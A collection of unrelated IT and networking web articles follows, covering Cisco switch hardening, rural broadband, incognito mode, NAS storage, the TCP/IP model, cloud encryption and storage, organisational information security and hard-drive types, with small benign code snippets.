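As a taste of what a secure base configuration involves, the fragment below shows a few common Cisco IOS hardening commands that address the attacks named above: hard-setting port modes, disabling DTP negotiation, and moving the native VLAN off VLAN 1 to blunt double-tagging. Interface names and VLAN numbers are placeholders, and this is an illustrative sketch rather than the course's actual configuration (some platforms also require "switchport trunk encapsulation dot1q" before setting trunk mode).

    ! Illustrative fragment -- interfaces and VLANs are placeholders.
    ! Access port: fix the mode and disable DTP negotiation.
    interface GigabitEthernet0/1
     switchport mode access
     switchport access vlan 10
     switchport nonegotiate
    !
    ! Trunk port: unused native VLAN and an explicit allowed-VLAN list.
    interface GigabitEthernet0/24
     switchport mode trunk
     switchport trunk native vlan 999
     switchport trunk allowed vlan 10,20
     switchport nonegotiate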
A shift has occurred in agriculture: farmers are relying not only on clouds but, increasingly, on the cloud. With the click of a mouse, farmers can find out in real time which fields need water and chemical inputs. The use of this technology, called precision agriculture, is making farming more productive and environmentally friendly, and it is revolutionizing how our food is cultivated.

The Food Basket of the World

California's Central Valley seems like it would be at the forefront of this shift towards precision agriculture. Called "the food basket of the world," California produces 70% of the total fruit and tree nut farm value and 55% of the vegetable farm value for the United States, all within driving distance of Silicon Valley's technology hub. But ironically, California's agriculture has fallen behind.

Lack of Access

Many rural communities in California lack the reliable, fast mobile broadband that can keep them competitive with global agriculture and safeguard our environment. While California has a program for ground-truthing reported broadband speeds, the program prioritizes households, not farms, and considers farming areas "unpopulated" in terms of need. The result is that rural economies in California are falling behind due to inadequate broadband access.

The San Francisco-Bay Area ISOC Chapter is taking this problem very seriously and is working in collaboration with the Internet Society (ISOC) to alleviate it. The Chapter just received funding through ISOC's Beyond the Net funding program to support the "Bridging California's Rural/Urban Digital Divide with Mobile Broadband" project, which will collect data on mobile broadband performance in Yolo County – a 90-minute drive from San Francisco – and compare that performance both to what mobile providers claim they're delivering and to what farmers need for precision agriculture.

Data and Policy

The information collected will be used to report to state officials and inform public policy making on rural broadband. The Chapter will be working with the California State University (CSU) Geographical Information Center (GIC), Chico and Valley Vision to develop the most robust report it can. Innovation in California has always propelled the rest of the USA – we need look no further than Silicon Valley to confirm that. Now we're looking just outside the confines of Silicon Valley and towards our rural neighbors to help strengthen broadband capacity in Yolo County.

Keep up to date with the "Bridging California's Rural/Urban Digital Divide with Mobile Broadband" project on the Chapter's website, http://www.sfbayisoc.org/.

About the SF-Bay Area Chapter – The San Francisco Bay Area ISOC Chapter has almost 2,000 members and serves California, including the Bay Area and Silicon Valley, by promoting the core values of the Internet Society.
Updated March 20, 2023.

Every day, millions of people use browsers like Google Chrome, Firefox and Safari to search the internet. Out of those millions of people, a fair portion use incognito mode in an attempt to maintain their privacy and stay safe on the internet, even though this is not what incognito mode was created to do. While there is no harm in using incognito mode, it's important to understand what it was actually created to do, which is to keep your local browsing private. Continue reading to learn what incognito mode does and doesn't do, and how you can actually browse the internet privately.

What is Incognito Mode and Is It Safe?

Incognito mode, also known as private browsing, is a browsing mode that can be turned on and off within browsers. Many people use incognito mode so their search history and web browsing history aren't saved. However, it's important to note that even if your history isn't saved in your browser, third parties will still be able to see it. There's nothing unsafe about turning incognito mode on, so feel free to enable it whenever you'd like – but be cautious about its true capabilities, as they might not be what you think they are. There are many misconceptions when it comes to what incognito mode does and doesn't do, so let's go over two of the most common ones.

Incognito Mode Misconceptions

Here are two misconceptions when it comes to using incognito mode.

Internet Service Providers (ISPs) won't be able to see what you search

One of the biggest misconceptions about using incognito mode in your browser is that it'll prevent anyone and everyone from seeing what you've searched for or which sites you've visited. This is not true. Your search and browsing history is only erased from your browser. This means your ISP, workplace or school will still be able to see the websites you've visited and the things you've searched for when you're connected to their network or using their devices.

Incognito mode can protect you against cyberthreats

Another common misconception about incognito mode is that it acts as protection against cyberthreats. This is also not true. You're just as vulnerable to cyberattacks when using incognito mode as you are when browsing normally. The only true way to protect yourself when browsing online is by implementing cybersecurity best practices.

What Incognito Mode Does

Here are a few of the things that incognito mode actually does when it's switched on.

Stops your browser from saving your browsing history and search queries

The websites you visit are never saved in your browser's history when incognito mode is on. However, that doesn't mean they're invisible to third parties. Third parties such as your workplace or ISP can still see the websites you've visited and the things you've searched for. But that doesn't mean the feature is useless. Incognito mode is useful when you don't want your browsing or search history to be viewable by other people with physical access to your computer. For example, say you wanted to book a surprise trip for your mom: booking the flight and hotel in incognito mode prevents her from stumbling on your secret plan in the browser history.

Erases cookies and site data

When you close incognito mode after browsing and searching around the internet, your cookies and site data are erased.
Cookies are small files of data created by a web server to identify your device. This data is sent to your browser and is used to track the websites you visit, as well as the sites you've returned to. When you return to a site you first visited in incognito mode, the site won't recognize you as a returning visitor.

Logs you out of accounts

If you log in to one of your accounts while using incognito mode, or fill out an online form, none of that information will be saved when you close your browser window. This makes incognito mode extremely helpful when you're borrowing someone else's computer or using a shared computer, such as in a library or at work.

What Incognito Mode Does Not Do

Here are a few things that incognito mode does not do when switched on.

Hide your location

Unless you use a VPN to hide your IP address, anyone can track down your location, including websites, cybercriminals and other third parties. Incognito mode makes no difference when it comes to your location.

Mask your IP address

Incognito mode in no way prevents websites or cybercriminals from seeing your IP address, so even with it switched on, anyone who wants to can still see your IP address.

Keep you protected from cyberattacks

It's important to remember that incognito mode is not a cybersecurity solution. With incognito mode on, you are still just as likely to be targeted by cybercriminals attempting to compromise your accounts or steal your sensitive information as you are with it off.

Prevent third parties from seeing what you do

Third parties can still see what you're doing in your browser without any issue. If you log into Facebook from an incognito tab, your ISP will know what you did, and Facebook will still have access to some of your data. Even though your browsing history and cookies are deleted once you close the incognito window, your data can still be traced back to you. These days, websites have access to sophisticated tools, like browser fingerprinting, that allow them to link your activity to your real identity even when you're using incognito mode. Keep in mind that you need to be especially careful when using the internet at work or school: many schools and companies run additional tracking software that lets them see what you're doing, whether you're using incognito mode or not. For this reason, you shouldn't do anything you want to keep private on a work or school computer.

How Can I Actually Browse Privately?

There is no absolute guarantee of complete privacy when browsing online, since backdoors and vulnerabilities are discovered every day, so there is always some risk when you surf the web. But one thing you can do when trying to browse privately is use a Virtual Private Network (VPN). A VPN encrypts your data and protects your online identity by masking your IP address. When you use a VPN, your traffic is redirected through a secure, encrypted connection to a separate server. Essentially, your ISP will see that you've connected to a VPN, but everything after that will be private. For example, when you visit a website, your IP address will show up as your VPN's IP, not your own, which prevents websites from seeing who you are in most cases.

The internet can be a treacherous place, and incognito mode doesn't do much to protect your privacy. If you want to browse the internet privately, the best thing you can do is invest in a VPN.
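To see the effect a VPN has on your apparent identity, you can check the public IP address that websites observe for your traffic. The Python sketch below is a minimal illustration using the public ipify service (the choice of service is an assumption for illustration); run it with your VPN off and then on, and compare the two results.

    # Minimal sketch: print the public IP address websites see for your traffic.
    # Requires the third-party 'requests' package; uses the public ipify API.
    import requests

    ip = requests.get("https://api.ipify.org", timeout=5).text
    print(f"Websites currently see your traffic as coming from: {ip}")
    # With a VPN connected, this should print the VPN server's address,
    # not the address your ISP assigned to you.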
Network Attached Storage

What is NAS?

A NAS system is a high-capacity storage device connected to a network that allows authorized network users and clients to store and retrieve data from a centralized location. Fundamentally, a NAS device is simply a container for hard drives with some additional intelligence included so that files can be shared and access authorized. Because a NAS device uses a technology called Redundant Array of Independent Disks (RAID), it can distribute and duplicate the stored data across multiple hard disks. That redundancy ensures data resilience if any drive fails.

Why do organizations use NAS?

NAS systems are versatile, flexible, and scalable, so you can add onto existing solutions as your storage needs grow. They can be either pre-populated with disks or diskless, and they have one or two USB ports so you can connect printers or external storage drives to the network, giving all connected users additional options.

Do you need IT to manage NAS?

Because NAS devices are simple to operate and can be configured and managed through a browser-based utility, you may not need an IT professional on standby to manage storage. Additionally, a NAS device can be accessed remotely, allowing it to serve as a private Dropbox or Google Drive with far more storage and no monthly cost.

How does a NAS device work?

A NAS device runs on any platform or operating system. It is essentially a bundle of hardware and software with an embedded operating system that lets it run independently. Often, it is a simple combination of a network interface card (NIC), a storage controller, a number of drive bays, and a power supply. NAS devices contain anywhere from two to five hard drives to provide redundancy and fast file access. While NAS is often thought of as a mini-server, its controller only manages disks for storage and does not operate as a general-purpose server.

In basic terms, a NAS device is an appliance that connects directly to the network, either through a hardwired Ethernet (RJ45) cable or via Wi-Fi, operating within a LAN rather than across a WAN. It is assigned an IP address, and data transfers between users, servers, and the NAS travel over TCP/IP. NAS operates with a traditional file system – either New Technology File System (NTFS) or NFS for remote file services and data sharing. All storage on the device is accessed at the file level through a file share.

NAS devices deliver shared storage as network mounted volumes and use protocols like NFS and SMB/CIFS (a brief mounting example appears after the component list below). When it's used for shared storage, the NAS device attaches multiple servers to a common storage device. These "clusters" are often used for failover through a cluster-shared volume, which allows all cluster nodes to access the same data.

A NAS consists of the following elements:

- Hardware: The hardware is simply a server that contains storage disks or drives, processors, and RAM. Known as a NAS box, unit, server, or head, it handles only two types of requests: data storage and file sharing.
- Software: Storage software comes preconfigured and installed on the above hardware, deployed on a lightweight operating system embedded in the hardware.
- Network switch: Users access data transfer protocols through this switch, essentially the central point that connects to everything and routes requests.
- Protocols: Transmission Control Protocol (TCP) breaks data into packets, which are delivered over Internet Protocol (IP).
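To make the "network mounted volumes" idea concrete, here is a hedged example of mounting a NAS share from a Linux client over each protocol. The server address, share names, and mount point are placeholder assumptions, and the commands assume the usual client packages (nfs-common or cifs-utils) are installed.

    # Illustrative commands -- server address, share, and mount point are placeholders.
    sudo mkdir -p /mnt/nas

    # NFS mount:
    sudo mount -t nfs 192.168.1.50:/volume1/share /mnt/nas

    # SMB/CIFS equivalent (prompts for the password of the given user):
    sudo mount -t cifs //192.168.1.50/share /mnt/nas -o username=alice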
What are the benefits of using NAS?
NAS systems are becoming a popular choice for businesses because they are effective, scalable, low-cost storage solutions. Using a NAS system, users can easily work together and serve customers because data is continually accessible. Selecting NAS over other solutions depends on current backup and recovery business requirements. The following are benefits of using NAS for data protection plans and business needs:

Speed
As a LAN-connected device, a NAS can store and transfer files quickly over the local network. It can also rapidly back up files so incremental changes are protected.

Control
Using a NAS means that companies are not relying on a third party for storage, which allows them to maintain total control over access to their data.

Ease of use
Because NAS has been around for years, administrators are familiar with how to set up and manage these systems. In addition, setup is simpler because many NAS architectures come with simplified scripts or streamlined operating systems already installed.

Accessibility
Because NAS devices sit on a dedicated network, users can access data from anywhere on that network. Also, since a NAS is positioned on site, access to it is not subject to Internet service interruptions.

What is the difference between NAS and SAN protocols?
There are two main types of networked storage: NAS and storage area networks (SANs). Both NAS and SAN were developed to make stored data available to multiple users simultaneously. Each provides dedicated storage for a group of users, but they take totally different approaches. A NAS device is a relatively affordable single storage device that serves files over Ethernet and is easy to set up. A SAN is a tightly coupled network of multiple devices that is quite a bit more complex to set up and manage.

From a user perspective, the biggest difference between the two is that NAS takes care of unstructured data, including audio, video, websites, text files, and MS Office documents, while SANs handle structured data, or block storage, inside databases. Additionally, how they work differs quite a bit. Both manage I/O requests, but a NAS handles them for individual files while a SAN handles them for contiguous blocks of data. And each uses a different protocol for moving traffic: NAS uses Transmission Control Protocol/Internet Protocol (TCP/IP), while a SAN can use the Fibre Channel (FC) protocol or the Ethernet-based iSCSI protocol. Finally, they differ in how a client OS views each of them. To a client OS, a NAS appears as a single device managing individual files, while a SAN appears to the client OS as a local disk. As a block-based data system, a SAN often houses business-critical databases instead of the "economy class" NAS device.

Why do small businesses use NAS?
When it comes to data storage, small businesses need low-cost, scalable storage with easy operation and data backup. The following are a few examples of how organizations manage this.

A leading telecom operator was looking for an easily managed backup solution that would fit its limited budget. The company was particularly concerned with the volume of internal data generated by its employees and how to find disk space for all of it. With more than 1,600 employees and at least that many desktops, laptops, and mobile devices, its 2 PB storage capacity wasn't enough. It also needed strong data protection and easy maintenance to free up the staff members who were responsible for routine manual backups. The company chose NAS for its low-cost, high-capacity file-sharing capabilities.
A major cloud-based platform provider for the mortgage finance industry had 30 billion small files to store, a rapidly growing volume that its current storage capacity could not manage efficiently. The company was struggling with repair, expansion, and maintenance issues and was constantly concerned with security for its clients. It found a reliable scale-out NAS file system that offered significantly better storage efficiency and cost savings on rack space, power, cooling, and heating. With a more scalable, flexible, and available system, the provider was able to devote less time and resources to storage and more time to customers.

A national prison system needed a storage system that would reliably preserve the high-definition video surveillance used to ensure the safety of staff and prisoners. Its existing storage array lacked visibility and an automatic process for systematically deleting video, which led to capacity problems, and an upgrade to high-definition video only compounded the problem. The organization implemented a NAS solution with much larger capacity and room for expansion that delivers the ability to review the data and comply with preservation requirements.

HPE NAS solutions
HPE has NAS solutions that are secure, tailored, and economically feasible for large and small businesses alike. We offer resilient and self-protecting platforms to help you safeguard your unstructured data. Our solutions have native capabilities such as data encryption, sophisticated access controls, file access auditing, file immutability, and deletion prevention to help you reduce security risks.

HPE StoreEasy is designed to help businesses get the most out of their capacity, spend less time managing storage, and densely scale capacity as they grow and protect data. With StoreEasy, you can support tens of thousands of concurrent users with diverse workloads and ensure data security at rest and in flight with built-in encryption. And by using a StoreEasy management console, you can consolidate multiple interfaces, automate storage tasks, and centralize monitoring.

With the exponential growth in unstructured data, enterprises need scale-out solutions to manage it. HPE Apollo 4000 Systems are intelligent data storage servers that provide accelerated performance, end-to-end security, and predictive analytics for storage-intensive workloads.
<urn:uuid:aa02ecee-4f57-4d93-81d4-e18e67807b88>
CC-MAIN-2024-38
https://www.hpe.com/no/en/what-is/nas.html
2024-09-19T13:51:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00407.warc.gz
en
0.949888
1,839
3.109375
3
In this figure, the related layers of the two models share the same color. As you can see, the three layers of application, presentation, and session in the OSI model are grouped into a single layer (the application layer) in the TCP/IP model. The internet layer in the TCP/IP model is equivalent to the network layer in the OSI model. Finally, the link layer in the TCP/IP model performs the functions of the two OSI layers of data link and physical.

In the TCP/IP model:
- Application Layer: Consists of network applications and processes.
- Transport Layer: Provides end-to-end delivery and corresponds to the OSI transport layer. TCP and UDP are the main protocols of this layer.
- Internet Layer: Defines the IP datagram and routing.
- Link Layer: Contains routines for accessing physical networks.

The short socket sketch below shows where each of these layers surfaces in everyday code.
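In this minimal Python sketch, we compose the application-layer payload ourselves (an HTTP request to example.com, used purely for illustration), while the operating system supplies the transport, internet, and link layers:

```python
import socket

# Application layer: an HTTP request we compose ourselves.
request = b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"

# Transport layer: SOCK_STREAM selects TCP; the kernel segments our bytes.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # Internet layer: AF_INET selects IPv4; routing is handled by the OS.
    s.connect(("example.com", 80))
    s.sendall(request)
    # Link layer: Ethernet/Wi-Fi framing is invisible at this level.
    response = s.recv(4096)

print(response.split(b"\r\n", 1)[0].decode())  # e.g. "HTTP/1.1 200 OK"
```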
<urn:uuid:dfec2869-6bd3-48b9-83a9-f0cf74608cbf>
CC-MAIN-2024-38
https://www.itperfection.com/cissp/communication-network-security-domain-introducing/tcp-ip-model/
2024-09-19T13:13:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00407.warc.gz
en
0.867009
185
3.265625
3
When it comes to the cloud, one of the biggest stumbling blocks continues to be the risk of unintended data exposure. Organizations are concerned about putting sensitive data in the cloud, fearing that it might accidentally end up in the wrong hands. Some companies feel more secure keeping data in house rather than taking a risk on a cloud provider.

One good way to make sure that your data is secure in the cloud is by using encryption: encoding data with an algorithm so that it is unreadable to anyone who doesn't possess the decryption key. This keeps the data safe because, if it did happen to fall into the wrong hands, it would be unreadable without the key.

To determine how your cloud vendor handles encryption, ask these questions:
- Does the cloud vendor encrypt your data both at rest and in transit?
- What level of encryption does the cloud vendor employ?
- Who has access to the encryption key?
- What encryption standards have been employed by the cloud vendor?
- How are encryption keys managed, and where is the encryption key located?

Do you believe that encryption is a good option for keeping data secure, and that this idea is ripe? Or do you believe this is hype and encryption isn't a good option for keeping data secure?
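The key-access question above matters because encryption can be done client side, before the data ever reaches the provider. Here is a minimal sketch using the Fernet recipe from the Python cryptography package; the plaintext and the key-storage arrangement are illustrative assumptions:

```python
from cryptography.fernet import Fernet

# Generate and store this key somewhere the cloud provider cannot reach,
# e.g. an on-premises key management system. Whoever holds the key
# controls access to the plaintext.
key = Fernet.generate_key()
cipher = Fernet(key)

plaintext = b"customer-records.csv contents"
token = cipher.encrypt(plaintext)   # this ciphertext is safe to upload
restored = cipher.decrypt(token)    # only possible with the key

assert restored == plaintext
```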
<urn:uuid:331d4d9b-2145-4fcb-b60a-be700830691a>
CC-MAIN-2024-38
https://logicalisinsights.com/2013/01/09/will-encryption-increase-data-security/
2024-09-07T11:12:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00671.warc.gz
en
0.943489
253
2.53125
3
The Difference Between Cloud Storage and Cloud Computing

What's the difference between cloud computing and cloud storage? The simple answer is "cloud computing" means running processes like software over the internet, and "cloud storage" means storing data on servers to make it accessible over the internet. If you're ready to learn more, we're taking a deeper look to help clarify the difference between cloud computing vs cloud storage and the various uses of each.

The simple way to remember the difference between cloud computing and cloud storage is: Cloud Storage = Data and Cloud Computing = Processing

Cloud Computing vs Cloud Storage
The "Cloud" is a catchall phrase used to describe a wide range of virtual solutions and services for individuals and businesses alike. Two such options people can choose from are cloud storage and cloud computing. Both provide benefits for businesses when implemented correctly, but they rely on each other to function and create value.

Cloud computing refers to more than just software; it is essentially anything in the cloud that isn't cloud storage. You can have cloud storage without cloud computing, but you won't be able to access data stored in the cloud over the internet without some kind of online processing, a.k.a. cloud computing. Likewise, you cannot have cloud computing without cloud storage, because the apps need to be stored somewhere (the cloud). To understand this relationship and the difference between cloud computing and cloud storage, let's look at examples of each.

Related Reading: Cloud Enablement: What It Is and How to Get Started

Benefits of Cloud Storage
Cloud storage is simply storing data and files, and performing backups, to an external location offsite. The main benefit of this solution is that it ensures a company's data is kept secure and readily available in case onsite data is lost or there is some form of unexpected disaster, like a fire that destroys the business. Plus, data is stored on a virtual server, not the employees' actual devices. Key benefits include:
- Improved Access
- Improved Collaboration
- Improved Security
- Improved Backup and Disaster Recovery
- Improved Agility

Benefits of Cloud Computing
Cloud computing is running applications or performing a computational process over the internet. There are numerous benefits companies gain by moving a large portion of their IT solutions to a cloud computing model. Key benefits include:
- No special hardware requirements.
- The ability to access apps and data from just about anywhere on just about any device.
- Rolling out upgrades, updates, and patches is fast, simple, and easy, since it only needs to be performed on the virtual server, not on every single employee computer and/or device.
- Improved Mobility
- Improved Scalability

Options for Migrating to the Cloud

Migrating to the Cloud: Cloud Computing or Cloud Storage?
A cloud migration generally refers to both data and processes being moved from on-premises to the cloud; in most business use cases you are talking about both. For example, an Adobe Cloud subscription comes with apps (cloud computing) and file storage (cloud storage). This is an example of the Software-as-a-Service model; however, there are multiple paths to the cloud.
Most businesses use some combination of any or all of these types of cloud computing and cloud storage:
- Home-grown Networks (VPNs)
- Virtual Desktop Hosting
- In-House Data Centers
- Application Hosting
- Cloud Backup & Data Storage Service
- Website Hosting
- Ecommerce Hosting

Cloud Computing Migration Options
For most office staff, when we talk about cloud computing, we are talking about adopting solutions so you can do your job from anywhere and save costs. Your options here include Software-as-a-Service, desktop virtualization, and/or application hosting.

A good example of Software-as-a-Service is Google Docs. Here the app and data all live on Google servers. Compare that to a hosted instance of Microsoft Word: the application is the same as a traditional install on your local hard drive, only it's installed on an off-site server and accessed remotely.

Virtual desktop hosting allows entire user desktops to be stored on a remote server; all you need to connect is an internet connection. Imagine a really long cord stretching from your monitor across state lines to a remote location where it plugs into your computer. It's a little more complicated than that, but from a user's perspective this is how desktop hosting works. When properly implemented, it is a seamless and highly secure experience. With virtual desktop hosting you can connect all of your many clouds, from SaaS to application hosting.

Cloud Storage Migration Options
Public cloud storage is what consumers are most familiar with. This includes Amazon AWS, Microsoft Azure, Google, and iCloud. These services are used to store data, house applications for front and back offices, and host SaaS-native solutions.

Managed cloud hosting services are when you hire an outside firm to design, maintain, and monitor your data and application storage. This is a good option for sensitive business information like financial data or proprietary information. With dedicated hosting, businesses can quickly launch a cloud solution for more mobility and maintain tighter control of their data and systems.

In-house data centers can be connected via remote desktop, VPN, etc., and this is still common. However, with the amount of data being generated by businesses today, they are rarely the only storage a company has. It's just too hard to keep up in today's IT environment, and most businesses need a partner company that is totally focused on cloud architecture. Plus, without offsite backup and storage, your data is in danger of being lost and unretrievable.

Where does virtual desktop hosting fit in? Virtual desktop hosting allows you to store and power a user's entire desktop experience on a remote server. This is a managed cloud hosting service, and it is a powerful combination of cloud computing and cloud storage. The benefits of hosted virtual desktops often include:
- Reduced Server Maintenance & Overhead
- Improved Accessibility and Mobility
- Tighter Security and Monitoring
- Software Maintenance Included
- Better Performance Across Devices
- Automatic Backups

The right virtual desktop hosting solution should be able to deliver almost any application. You should now have a good understanding of the difference between cloud computing and cloud storage. It's simple: cloud storage = data and cloud computing = processes. One key takeaway from this post is that there is really no weighing of options between cloud computing and cloud storage; they work together and are both critical for keeping pace in today's rapidly changing tech environment.
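To see the storage half of the split in actual code, here is a hedged sketch using AWS's boto3 SDK. The bucket name is a placeholder, and credentials are assumed to be configured in the environment; storing and retrieving the object is pure cloud storage, while any server-side processing of it (say, a function triggered by the upload) would be cloud computing:

```python
import boto3  # AWS SDK for Python; credentials configured separately

# Hypothetical bucket name: "cloud storage" here just means durable
# object storage that holds bytes until something asks for them.
BUCKET = "example-backup-bucket"

s3 = boto3.client("s3")

# Cloud storage: the data lives on the provider's servers...
s3.upload_file("report.pdf", BUCKET, "backups/report.pdf")

# ...and can be pulled back down to any device with access.
s3.download_file(BUCKET, "backups/report.pdf", "report-restored.pdf")

# Cloud computing, by contrast, would be the provider *processing* the
# object (e.g. a serverless function fired by this upload), not merely
# holding it.
```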
For most businesses and consumers, cloud usage includes both storage and computing. Are you looking for a simple way to migrate some or all of your Information Systems to the cloud? CyberlinkASP’s desktop hosting can serve up any application.
<urn:uuid:609c879c-bf88-4b2b-aab9-7f720789e6c0>
CC-MAIN-2024-38
https://www.cyberlinkasp.com/insights/difference-cloud-storage-cloud-computing/
2024-09-08T17:05:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00571.warc.gz
en
0.912544
1,451
2.765625
3
Who would you identify as the person who is or should be responsible for information security in your organisation? Do they need to be at a senior level? Perhaps an external agency, or should a whole department be assigned to look after it? The truth of the matter is that everyone is responsible: from the CEO, to the board, to the people operating the tills and the work-experience student fresh from university. We are all responsible for keeping information secure.

Data. Worth more than gold?
We all know that an organisation cannot survive, and certainly can't thrive, without data. Without data, there is no information; without information, there is no knowledge; without knowledge, there is no wisdom. Organisations of all sizes need data. A window cleaner who has a simple 'black book' of addresses, with amounts of money owed, is carrying data. If that black book was lost, stolen or destroyed, the impact on their business could be significant. Data is the foundation upon which all organisations are built. Think about it this way: Google is worth billions, but what is its core asset? Data. How about Facebook? The same answer. Data is not just valuable; it's worth more than gold and oil.

Protecting your assets
The protection of data and the security of information can't be handed to one person or department in an organisation, because everyone has an impact on the ability to keep it safe. For example, expecting your IT department to be solely responsible for it is like expecting your finance team to be responsible for saving money but then allowing everyone else to do as they please, ignoring income and expenditure! Everyone in your organisation collects, processes and shares data and information; therefore, how they protect it is of key importance to everyone.

A good way to illustrate and highlight this is to conduct a data audit so that you can unearth where your valuable assets are. You'll probably have already carried out something like this when the General Data Protection Regulation (GDPR) came into force, but it's worth revisiting at least annually. Ask the heads of each function to identify:
- Key processes they have
- Each system they use to help in the processes identified
- What information they hold (customers, employee details, financial etc.)
- What data they hold (name, DoB, address, national insurance numbers, email etc.)
- How much information they hold (10,000 records? 100 records?)

The above will help to build a picture of the data assets you hold so you can make some decisions about how you protect them.

Everyone is responsible, only one is accountable
It doesn't matter if your organisation employs five, five hundred or five thousand; everyone has a part to play in protecting data and ensuring information security. From the receptionist on the front desk, who has knowledge (based on data) that the CEO is flying to the USA at 1pm, to the CEO who is flying to the USA to discuss the latest acquisition. Everyone is responsible, in a large or small way, for ensuring data doesn't fall into the wrong hands and isn't accidentally (or deliberately) lost or stolen. Each person in an organisation processes data in a variety of ways, under increasing pressure to process more and more, faster and faster. It's vitally important that we all understand that we can have a positive or negative impact on our organisations in the way we process and protect data. But if we are all responsible for information security, who is accountable?
Is it the person hired to ensure there is a programme in place to protect data? The answer is no. Even the person hired to help in this regard is not truly accountable for information security. In the GDPR, there is an overriding seventh principle known as the principle of accountability, which means that the data controller must be able to evidence that appropriate technical and organisational measures are in place to protect data. Just as in health and safety, if there is a breakdown in the ability to protect individuals, then someone must be held accountable. Accountability, therefore, rests with the head of the organisation: the business owner or the CEO. This is no different for information security.

Health and Safety for Data
For far too long, organisations have employed an Information Security Manager and said, "It's your job. Make us secure!" Although of course it's their role to lead and guide you on your journey to become more secure, they can't do it alone. It's a little like hiring a Health and Safety officer and asking them to ensure you don't have accidents, but then allowing people to run around blindfolded, carrying scissors!

Everyone understands the relevance of health and safety. Although we may sigh at some of the things we need to comply with, most people recognise the importance of it because, perhaps, we have seen first hand the impact of NOT doing it right. Information security is no less important, but the impact of getting it wrong is often not fully understood or realised. This is because the impact is rarely discussed, for fear of 'scaremongering'. As professionals who are the project leads, or guides, on this journey, we need to stop being so squeamish. We need to explain why having weak passwords is a bad thing. We need to explain what the impact is if we click on an infected link in an email. Without context, people won't know why they need to follow our guidance. Just because people are aware that having weak passwords is a bad thing, it doesn't mean they care. We need to emphasise that it is their responsibility to follow good practice in protecting data and ensuring information security.

Everyone is responsible for information security. It can't be done in isolation, or have one person named as responsible. We're in this together, and if each one of us was a little more aware of the positive impact our behaviour can have on the security of our organisations, then people might just start taking notice. Information security, like health and safety, is everyone's responsibility. Security is no accident; it's a choice each of us makes every day.
<urn:uuid:d8464e66-884c-451f-b184-fb5969628af2>
CC-MAIN-2024-38
https://cyberfortgroup.com/blog/who-is-responsible-for-information-security/
2024-09-11T03:09:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00371.warc.gz
en
0.951936
1,304
2.796875
3
With all of the new technologies coming out today, it is easy to lose track. We're here to help, and in this post I will go over the most common styles of storage and hard drives that can be placed in a computer.

- Starting with the oldie but goodie, we have the classic Hard Disk Drive, also known as an HDD. These drives have been around for so long that the technology is almost as good as it is going to get; the only thing still being improved is space efficiency. Because the technology is so mature and cheap to produce, an HDD is going to be your cheapest storage option, with a 1TB (1,000GB) drive usually costing less than $100 depending on your vendor. HDDs usually come in two speeds: 5,400RPM and 7,200RPM. There are 10,000RPM and higher drive speeds, but those are normally reserved for servers, not everyday users. These drives tend to last around 5 to 8 years depending on usage. They are the bread and butter of hard drives and will be around for many more years to come.
- Next we have the new kid on the block: the Solid State Drive, or SSD. These drives have actually been around for quite some time; however, they have only become affordable in more recent years. SSDs are the Lamborghinis of storage media: extremely fast, but without as much trunk space as their more affordable cousins, the HDDs. The SSD has slowly been coming down in price, making it more common in new systems. You will most often find them in laptops, where heat management and speed are more of a concern. These drives make booting up your system amazingly fast: a typical system booting Windows 10 from an SSD will go from power-button press to the login screen in roughly 5 to 8 seconds. Compare this to a standard 7,200RPM HDD, where you are looking at anywhere between 2 and 5 minutes depending on the version of your operating system. So if you are looking for a high-performance drive and are not too concerned about storage space, look no further than an SSD for your next system.
- The final drive type we will be talking about is the Solid State Hybrid Drive, or SSHD. These drives, just as the name suggests, are a mix of hard drives and SSDs. With an SSHD you sacrifice a little bit of the SSD's speed for the massive storage of an HDD, at about 25-50% of the cost of a similar-size SSD. SSHDs work by "learning" which files are used most and placing them in the SSD portion of the drive, which allows those files to load much faster. These typically end up being your OS files and maybe one or two of the programs you use the most. SSHDs are a common pick for those wanting to upgrade their systems who just do not have the budget for an SSD that meets their storage needs.

Hopefully this clears up a little of the mystery around hard drives. If you are looking to upgrade your system, or your system just is not moving along like it used to, do not hesitate to give us a call and we will get you taken care of. We are your Austin Area Computer Repair and IT Service & support company. Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in affordable IT Support, Cybersecurity Services, IT Services, IT Security, Office 365, Cloud, VOIP Services, SPAM, Wireless, Network Monitoring Services, Custom Gaming PC, MAC repair, PC Repair In Austin, Virus Removal, remote support, web design, on site support and much more. See what our clients have to say about us on Yelp!
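If you want to see the HDD/SSD speed gap from the comparison above on your own machine, a rough sequential-throughput test is easy to write. This is a minimal Python sketch: the folder paths are placeholders, and operating-system caching can inflate the read figure, so treat the numbers as ballpark only:

```python
import os
import time

def sequential_throughput(folder: str, size_mb: int = 256) -> tuple[float, float]:
    """Write then read a test file; return (write_MBps, read_MBps)."""
    data = os.urandom(1024 * 1024)  # 1 MiB of incompressible data
    test_file = os.path.join(folder, "bench.tmp")

    start = time.perf_counter()
    with open(test_file, "wb") as f:
        for _ in range(size_mb):
            f.write(data)
        f.flush()
        os.fsync(f.fileno())  # force the bytes onto the drive itself
    write_mbps = size_mb / (time.perf_counter() - start)

    start = time.perf_counter()
    with open(test_file, "rb") as f:
        while f.read(1024 * 1024):
            pass
    read_mbps = size_mb / (time.perf_counter() - start)

    os.remove(test_file)
    return write_mbps, read_mbps

# Point these at folders on different drives to compare them.
print(sequential_throughput("C:/temp"))  # e.g. an SSD
print(sequential_throughput("D:/temp"))  # e.g. an HDD
```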
<urn:uuid:e4e1f9b5-0e9b-474b-8082-42c0c03e0d2c>
CC-MAIN-2024-38
https://www.fcnaustin.com/hard-drive-breakdown/
2024-09-11T03:55:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00371.warc.gz
en
0.964319
771
2.546875
3
